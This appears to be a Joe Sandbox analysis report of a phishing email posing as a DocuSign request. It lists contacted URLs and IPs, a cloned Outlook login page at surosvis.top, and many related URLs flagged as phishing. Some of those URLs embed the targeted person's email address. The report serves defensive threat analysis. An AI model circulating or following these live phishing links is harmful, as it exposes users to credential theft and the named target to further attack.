https://ipinfo.io/	false	URL Reputation: safe	unknown
https://gaunited.org/?xhjvrczy&email=chigley@live-quinn.com	false	Avira URL Cloud: safe	unknown
https://gaunited.org/?xhjvrczy=7916a6b310ba6eced760b22d1d46271e3b1540bdd0cf0f26568259caa28bcc2cc4a34477ba1ecd9bb18135b16dc936bdbe30f9b85e8f3a82522031c68449ab57&email=chigley%40live-quinn.com	true	SlashNext: Credential Stealing type: Phishing & Social Engineering	unknown
https://surosvis.top/?qrc=chigley%40live-quinn.com	true	Avira URL Cloud: phishing	unknown
https://viptim.ro/tracking/?_kx=QQVQv7pTKTVf-H7icyjL1J6aYjdRZ9Cf7t5_maW1x_Ei05hf6bB9VkFjonW776uh.YeGNPs	false	Avira URL Cloud: safe	unknown
https://surosvis.top/aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_sw-M8KkV3_nBot-G1ImRcw2.js	true	Avira URL Cloud: phishing	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/a6jpw/0x4AAAAAAAeIDT3Zcm3iJj6N/auto/normal/auto/	false		unknown
https://outlook.office365.com/owa/prefetch.aspx	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://shell.suite.office.com:1443	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://autodiscover-s.outlook.com/	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://useraudit.o365auditrealtimeingestion.manage.office.com	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://outlook.office365.com/connectors	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://cdn.entity.	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://api.aadrm.com/	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://www.yammer.com	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://api.microsoftstream.com/api/	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://cr.office.com	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://messagebroker.mobile.m365.svc.cloud.microsoft	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://otelrules.svc.static.microsoft	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://edge.skype.com/registrar/prod	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://res.getmicrosoftkey.com/api/redemptionevents	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://tasks.office.com	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://officeci.azurewebsites.net/api/	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
http://github.com/jquery/globalize	chromecache_141.8.dr	false	Avira URL Cloud: safe	unknown
https://my.microsoftpersonalcontent.com	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	Avira URL Cloud: safe	unknown
https://store.office.cn/addinstemplate	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://edge.skype.com/rps	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://messaging.engagement.office.com/	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://www.odwebp.svc.ms	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://web.microsoftstream.com/video/	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://api.addins.store.officeppe.com/addinstemplate	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://github.com/douglascrockford/JSON-js	chromecache_151.8.dr	false	Avira URL Cloud: safe	unknown
https://graph.windows.net	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
http://www.opensource.org/licenses/mit-license.php)	chromecache_137.8.dr, chromecache_151.8.dr	false	URL Reputation: safe	unknown
https://consent.config.office.com/consentcheckin/v1.0/consents	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://d.docs.live.net	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	Avira URL Cloud: safe	unknown
https://safelinks.protection.outlook.com/api/GetPolicy	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://ncus.contentsync.	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
http://weather.service.msn.com/data.aspx	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://support.docusign.com/articles/How-do-I-sign-a-DocuSign-document-Ba=	July2024.eml	false	Avira URL Cloud: safe	unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://pushchannel.1drv.ms	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://wus2.contentsync.	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/ios	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://api.addins.omex.office.net/api/addins/search	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://outlook.office365.com/api/v1.0/me/Activities	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://entitlement.diagnostics.office.com	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://login.windows-ppe.net	chromecache_155.8.dr	false	URL Reputation: safe	unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://outlook.office.com/	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://support.docusign.com/articles/How-do-I-sign-a-DocuSign-document-Basic-Signing	~WRS{36F80BB7-642B-4BA9-8822-A4A1F086C932}.tmp.0.dr	false	Avira URL Cloud: safe	unknown
https://storage.live.com/clientlogs/uploadlocation	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr, chromecache_155.8.dr	false	URL Reputation: safe	unknown
https://substrate.office.com/search/api/v1/SearchHistory	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://service.powerapps.com	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://graph.windows.net/	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://devnull.onenote.com	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://messaging.office.com/	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://skyapi.live.net/Activity/	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://api.cortana.ai	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	Avira URL Cloud: safe	unknown
https://messaging.action.office.com/setcampaignaction	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://visio.uservoice.com/forums/368202-visio-on-devices	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://staging.cortana.ai	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://www.docusign.com/features-and-benefits/mobile	July2024.eml, ~WRS{36F80BB7-642B-4BA9-8822-A4A1F086C932}.tmp.0.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/embed?	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	Avira URL Cloud: safe	unknown
https://augloop.office.com	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://api.diagnosticssdf.office.com/v2/file	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://officepyservice.office.net/	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://api.diagnostics.office.com	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://store.office.de/addinstemplate	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://wus2.pagecontentsync.	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/datasets	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://cortana.ai/api	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://api.diagnosticssdf.office.com	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://login.microsoftonline.com/	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://powerlift.acompli.net	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://cortana.ai	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/imports	F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.98.179.146	FRA-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
3.69.127.43	linkprotect.cudasvc.com	United States	16509	AMAZON-02US	false
13.107.246.60	s-part-0032.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
216.58.206.68	www.google.com	United States	15169	GOOGLEUS	false
104.17.3.184	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
20.190.159.68	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
108.156.60.30	trk.klclick3.com	United States	16509	AMAZON-02US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
180.131.145.90	surosvis.top	Indonesia	45719	NAWALA-AS-IDNawalaProject-DNSFilteringProjectID	true
104.21.50.212	viptim.ro	United States	13335	CLOUDFLARENETUS	false
104.17.2.184	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.17

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1470335
Start date and time:	2024-07-09 20:51:14 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	July2024.eml renamed because original name is a hash value
Original Sample Name:	eSignature Required on _New Live-quinn Contract SC #73461-0-252 - Important Notices and Disclosures_ eSign chigley_Live-quinn 03July2024.eml
Detection:	MAL
Classification:	mal84.phis.winEML@23/71@26/12
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .eml

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe, TextInputHost.exe
Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 199.232.214.172, 13.69.239.72, 192.229.221.95, 52.109.68.129, 2.22.242.81, 2.22.242.112, 2.22.242.97, 2.22.242.130, 2.22.242.113, 2.22.242.104, 2.22.242.98, 2.22.242.121, 2.22.242.139, 142.250.185.195, 142.251.5.84, 172.217.16.206, 34.104.35.123, 23.38.98.104, 23.38.98.96, 216.58.212.138, 172.217.18.10, 142.250.184.234, 142.250.185.138, 142.250.185.170, 142.250.185.234, 142.250.185.74, 142.250.74.202, 216.58.206.42, 216.58.206.74, 142.250.186.106, 142.250.185.106, 142.250.185.202, 142.250.186.138, 142.250.186.74, 172.217.16.202
Excluded domains from analysis (whitelisted): omex.cdn.office.net, slscr.update.microsoft.com, clientservices.googleapis.com, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, clients2.google.com, ocsp.digicert.com, login.live.com, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, a1864.dscd.akamai.net, ecs.office.com, e40491.dscg.akamaiedge.net, onedscolprdneu00.northeurope.cloudapp.azure.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, prod.configsvc1.live.com.akadns.net, osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com, ctldl.windowsupdate.com, aadcdn.msauth.net, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, s-0005.s-msedge.net, config.officeapps.live.com, aadcdnoriginwus2.afd.azureedge.n
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: July2024.eml

Input	Output
URL: e-Mail Model: gpt-4o	```json{ "riskscore": 8, "brand_impersonated": "DocuSign, Microsoft", "reasons": "1. The email impersonates well-known brands DocuSign and Microsoft, which are commonly targeted by phishing attacks.\n2. The sender's email address (phil@qimacros.com) does not match the typical domain used by DocuSign or Microsoft, indicating potential spoofing.\n3. The subject line and email body create a sense of urgency by stating 'Your documents have been completed' and prompting the recipient to 'VIEW COMPLETE DOCUMENTS'.\n4. The button 'VIEW COMPLETE DOCUMENTS' is a common tactic used to induce clicks on potentially malicious links.\n5. The email contains a security code and instructions to visit DocuSign.com, which could be legitimate, but the overall context and other indicators suggest caution.\n6. The email includes a disclaimer about sharing the email and accessing the code, which is a common tactic to make the email appear more legitimate.\n7. The presence of multiple links and a call to download an app increases the risk of phishing."}

URL: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmN Model: Perplexity: mixtral-8x7b-instruct	{"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as email addresses and passwords.","There is no sense of urgency in the text.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
Title: x4qxv4hytn OCR: Outlook Microsoft chigley@live-quinn.com Enter password assword Forgot my password Sign in with another account Sign in Terms of use Privacy &
URL: https://surosvis.top Model: gpt-4o	```json{ "phishing_score": 9, "brands": "Microsoft", "phishing": true, "suspicious_domain": true, "has_prominent_loginform": true, "has_captcha": false, "setechniques": true, "has_suspicious_link": false, "legitmate_domain": "microsoft.com", "reasons": "The URL 'https://surosvis.top' is highly suspicious as it does not match the legitimate domain 'microsoft.com' associated with the brand Microsoft. The webpage mimics the Outlook login page, which is a common target for phishing attacks. The presence of a prominent login form asking for a password without any CAPTCHA further raises suspicion. The use of social engineering techniques is evident as the page attempts to trick users into entering their credentials by imitating a legitimate Microsoft Outlook login page."}

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
52.98.179.146	https://shoutout.wix.com/so/8dP2NQVHe/c?w=U1fBcW2O5dQTdsvx_upoqEYpm3E6io4L0nMWoaLOZlM.eyJ1IjoiaHR0cHM6Ly9waXlhd2F0Y2xpbmljLmNvbS9nYWhic2hiZ2ZiaG4vc2pkaGZ5am1pZGJoIiwiciI6ImRkN2FjYTYwLTE4MmUtNGRmNC1iOTA2LTFiODg1NDkyOTc4MyIsIm0iOiJtYWlsIiwiYyI6ImVkNDlmZGQwLTZiNzEtNDUyOC04MDRkLWUzNzQ3YzgyNmI2ZCJ9	Get hash	malicious	HTMLPhisher	Browse
	https://www.linkedin.com/redir/redirect?url=https%3A%2F%2Fassets-usa%2Emkt%2Edynamics%2Ecom%2F5513f990-d232-ef11-8e4b-000d3a98a01a%2Fdigitalassets%2Fstandaloneforms%2F12aaa575-c233-ef11-8409-000d3a4effc3&urlhash=z-cH&trk=public_profile-settings_topcard-website	Get hash	malicious	HTMLPhisher	Browse
	https://bauhausfurnituregroup-my.sharepoint.com/:f:/p/jcaviness/EuxDBQEPKl5GgFKsZtlqM6cBIeG-xo_6Y_SwA6y5sPoclQ?e=5%3ach0wDN&at=9&xsdata=MDV8MDJ8aGVscEB2Y2YuY29tfGViYjRlM2VmYWMxZjRjODhiZmIyMDhkYzkxMzRjYzAzfDVjMDJlODlhYjk2ODRkNGU5NjBkZTYyYzdjZDAyNzY2fDB8MHw2Mzg1NDQ5MDMyMDQzNjAxNTV8VW5rbm93bnxUV0ZwYkdac2IzZDhleUpXSWpvaU1DNHdMakF3TURBaUxDSlFJam9pVjJsdU16SWlMQ0pCVGlJNklrMWhhV3dpTENKWFZDSTZNbjA9fDB8fHw%3d&sdata=US9GVzlGQVVpb0tMcWU1c3BhSjB0bDkrajM4RFJGWStqanVhSkg0NVR2MD0%3d	Get hash	malicious	HTMLPhisher	Browse
	https://qx476hb2.r.us-east-2.awstrack.me/L0/https:%2F%2Flink.sbstck.com%2Fredirect%2F8c34dafe-7d40-4759-8c26-75472688d698%3Fj=eyJ1IjoiM3oyMHY3In0.QqDhAZjsHzRebGt2fCZ1o0v9_q3G5DlBtHVdybO84zw/1/010f018fee20e29f-4188bb2c-c372-47b4-bfe3-6bbf884b6d8a-000000/ARz_lUuZRh6_VQ2DFlMez4MOCi0=162	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse
	http://d84z.remcuaminhhai.com/cUVTSMtKabn4f7WiKrjDj7CKE5Dki7V0c1tnjiSCtLcP7hRKmtpEv3kqgBy3N6jZCahkYCPMdTFSadrDb6ecKQPZhCtU3eEq1vCcJ1KHMwE07qhMacUeY.dy53aXR0ZUB2b2x0YWxpYS5jb20=	Get hash	malicious	HTMLPhisher	Browse
20.190.159.68	https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakni	Get hash	malicious	Unknown	Browse
	Untitled attachment 00018.htm	Get hash	malicious	HTMLPhisher	Browse
	https://netorgft12024067-my.sharepoint.com/:b:/g/personal/yael_marketingbymonday_com/ERM2gymxTzdAl41Kx4h6M68BdJSkC-rRYzGQsJWFe5LdIg?e=KQw5km	Get hash	malicious	HTMLPhisher	Browse
	https://click.email.active.com/f/a/9ZSIMwxuS3nTzxIyiOMIjA~~/AAOtGgA~/RgRmvkOTP0SCaHR0cHM6Ly9jb21tdXNlcnVpLXZpcC5hdy5hY3RpdmUuY29tL2NsaWNrLzEvMTcwNjA5MTQwNy9lNzExOGEwZi02MjI4LTRhMDktOTE5Mi00NWJjNjBlZDlmZmQvNTFFNDM3QzYtNEJCRi00RDhGLTk2ODAtNzMyQjQxQjVDNjkwL1cDc3BjQgpk1Ky-22QJY2mTUhFobGV2cmFAc3RlcGFuLmNvbVgEAAAACw~~	Get hash	malicious	HTMLPhisher	Browse
	19 2023.msg	Get hash	malicious	HTMLPhisher	Browse
	https://links.mail.service-airfrance.com/ctt?m=22412736&r=MTExNDk4NDU5MzI5NwS2&b=0&j=MjA5NjQ4MDM3MAS2&k=options_option_2_ICI_PROMO_ST&kx=1&kt=12&kd=https%3A%2F%2Fucuzcaykazani.com/cp/?11=ZGhpcmFqLmJoYW1yYXlAeXVtLmNvbQ0=	Get hash	malicious	HTMLPhisher	Browse
	https://20cf9876.46c185d21857f77e70377968.workers.dev/	Get hash	malicious	HTMLPhisher	Browse
	Specifications & Data Sheet For EagleBurgmanan Industries UK Limited.html	Get hash	malicious	HTMLPhisher	Browse
	https://monngongiadinh.net/lw/sAssmjCJP9HoKfnERv-AVCHBSe9PmDE73arKx-N6TikJo4dd9mSnSDoDZ-BPoMvzsHXRqzRhYQiH-KneB9DbmFsR64jfEYC-6eqJ5pjPxeZghhF4Tf-FQHCtfpvZZp62CviFM-H2UzrBAL9uTtSgKuqi-ZMUncrSVgDup7QDshZ	Get hash	malicious	HTMLPhisher	Browse
	https://sites.google.com/view/meissnerjacquet/	Get hash	malicious	HTMLPhisher	Browse
108.156.60.30	https://groupe-aertec.atlassian.net/wiki/external/MmE1MDE0NmU1ZjQ0NGJjM2FkMGExMzIyYjgyMzcyN2U	Get hash	malicious	Unknown	Browse
239.255.255.250	(No subject) (30).eml	Get hash	malicious	HTMLPhisher	Browse
	http://adlidom.com	Get hash	malicious	Unknown	Browse
	https://u45299662.ct.sendgrid.net/ls/click?upn=u001.wCtd840MCvZfLUcfa1aXO9SBoWuHiRLSNXNhRali-2BZej9HHpRmK-2B9ob-2BZ1xtp8gIxmD1cCIXeHa-2BKqasv1Ey4mYn41zKpx2itihC3je5Cd5BosUOMKimQFkgDf6rbBJ-2Ff9GyB7CUB6gojEnZ8aQijZcKDQBJlQibMFHRXZzRwxgvqcRr2lkK5x3cgkmbGpqYgVzt3IjDJRQQEAiTJ5yELMlxlIBCPTsF64HZOUd0nOyw-2BgdFzN5XbdFmUlyver-2FotHw04t6vNDWSt74Nf9ou2Hf5I7S6Oj4-2BwVk-2BuMgCGm7nWYdtfADrPE1jvv-2BfT3adILp4_JhWgToIvlhf8IbyXGrG8GglWu5d4OO3mWF7G0NW268WP5xHPAH91Smpp-2FtRR9XuZpKnKdg4HDhWDJjJJqbsy3CETEnNy05m5SD4mKlJNLbHb9HbmD7EWJkqf98w2dIvZium8i4zWFkqRVKAxKp4ASC-2Fsc2qaOwL1HipMLWQLyXnDciGaAPfs5ThB8LH4A4fjOpAnQHDnaqDId42Y7pIhFkhd9sQB37NkzuC5dZa48XY-3D	Get hash	malicious	Unknown	Browse
	robert e-Doc File_170024.docx	Get hash	malicious	HTMLPhisher	Browse
	https://assets-usa.mkt.dynamics.com/165a2e8c-373d-ef11-8e49-000d3a8f6e27/digitalassets/standaloneforms/a85836a1-f33d-ef11-8409-002248344b7e	Get hash	malicious	Unknown	Browse
	https://u45299662.ct.sendgrid.net/ls/click?upn=u001.wCtd840MCvZfLUcfa1aXO9SBoWuHiRLSNXNhRali-2BZej9HHpRmK-2B9ob-2BZ1xtp8gIxmD1cCIXeHa-2BKqasv1Ey4mYn41zKpx2itihC3je5Cd5BosUOMKimQFkgDf6rbBJ-2Ff9GyB7CUB6gojEnZ8aQijZcKDQBJlQibMFHRXZzRwxgvqcRr2lkK5x3cgkmbGpqYgVzt3IjDJRQQEAiTJ5yELMlxlIBCPTsF64HZOUd0nOyw-2BgdFzN5XbdFmUlyver-2FotHw04t6vNDWSt74Nf9ou2Hf5I7S6Oj4-2BwVk-2BuMgCGm7nWYdtfADrPE1jvv-2BfT3adSQKz_p4A4YQt8epDIK9HlKea9sSCl3MXKBcpnU56jmD4aRDdTAeOMJcZw3f8VvV8NLbbjL0uMrdxhQK8GxzwqBkLcmylT-2FEY5XbwR3K-2FC6xfqqGuExQq3SNizKWxflJyHsJI0nslnt0a8xlK3Fd8H-2FKOV3XlJnsljFNByTu7JCMLXg-2BPQ54flDZp4tHyGuD3hMkJOlLEAOp0eJSpzLMOMd9b3yw-3D-3D	Get hash	malicious	HTMLPhisher	Browse
	https://infra-metals-com.fortimailcloud.com/fmlurlsvc/?fewReq=:B:JVc9NjQ1PSFxOjUpNyFuYzo3Nj03NiF0bmBpZnNydWI6MDJkNz43ZDFkNjc2MTVjZDA+PmM3ZGE2Y2NjMzczYjczNzNmNTMxNSFzOjYwNTcyMzAzNzchdm5jOjMxPk9oN2tNNDE/Nj8wNiozMT5PaDdrTDQxPzY/MDYhdWR3czohZDo1MyFvY2s6Nw==&url=https%3a%2f%2fapp.box.com%2fs%2f85jljehjkk29pmgilaop1n5jhwf19q71	Get hash	malicious	HTMLPhisher	Browse
	https://witechmonth.com/	Get hash	malicious	Unknown	Browse
